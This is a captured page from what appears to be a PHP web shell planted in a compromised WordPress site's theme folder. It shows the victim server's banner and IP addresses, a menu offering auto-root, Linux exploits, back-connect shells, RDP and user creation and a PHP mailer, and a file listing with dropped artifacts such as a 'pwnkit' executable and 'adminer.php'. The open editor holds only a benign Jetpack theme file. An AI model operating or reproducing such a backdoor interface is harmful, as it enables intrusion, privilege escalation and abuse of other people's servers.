Linux webm006.cluster131.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
Apache
: 10.131.20.6 | : 216.73.216.137
Cant Read [ /etc/named.conf ]
8.0.30
neuschi
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
neuschi /
www /
wp-content /
themes /
arrival /
inc /
[ HOME SHELL ]
Name
Size
Permission
Action
customizer
[ DIR ]
drwxr-xr-x
hooks
[ DIR ]
drwxr-xr-x
welcome
[ DIR ]
drwxr-xr-x
widgets
[ DIR ]
drwxr-xr-x
woocommerce
[ DIR ]
drwxr-xr-x
.htaccess
127
B
-r--r--r--
.mad-root
0
B
-rw-r--r--
adminer.php
0
B
-rw-r--r--
arrival-contents.php
2.58
KB
-rw-r--r--
dynamic-styles.php
18.1
KB
-rw-r--r--
enqueue.php
4.05
KB
-rw-r--r--
image-sizes.php
2.1
KB
-rw-r--r--
jetpack.php
1.39
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
template-functions.php
22.27
KB
-rw-r--r--
template-tags.php
9.63
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : jetpack.php
<?php /** * Jetpack Compatibility File * * @link https://jetpack.com/ * * @package arrival */ /** * Jetpack setup function. * * See: https://jetpack.com/support/infinite-scroll/ * See: https://jetpack.com/support/responsive-videos/ * See: https://jetpack.com/support/content-options/ */ function arrival_jetpack_setup() { // Add theme support for Infinite Scroll. add_theme_support( 'infinite-scroll', array( 'container' => 'main', 'render' => 'arrival_infinite_scroll_render', 'footer' => 'page', ) ); // Add theme support for Responsive Videos. add_theme_support( 'jetpack-responsive-videos' ); // Add theme support for Content Options. add_theme_support( 'jetpack-content-options', array( 'post-details' => array( 'stylesheet' => 'arrival-style', 'date' => '.posted-on', 'categories' => '.cat-links', 'tags' => '.tags-links', 'author' => '.byline', 'comment' => '.comments-link', ), ) ); } add_action( 'after_setup_theme', 'arrival_jetpack_setup' ); /** * Custom render function for Infinite Scroll. */ function arrival_infinite_scroll_render() { while ( have_posts() ) { the_post(); if ( is_search() ) : get_template_part( 'template-parts/content', 'search' ); else : get_template_part( 'template-parts/content', get_post_type() ); endif; } }
Close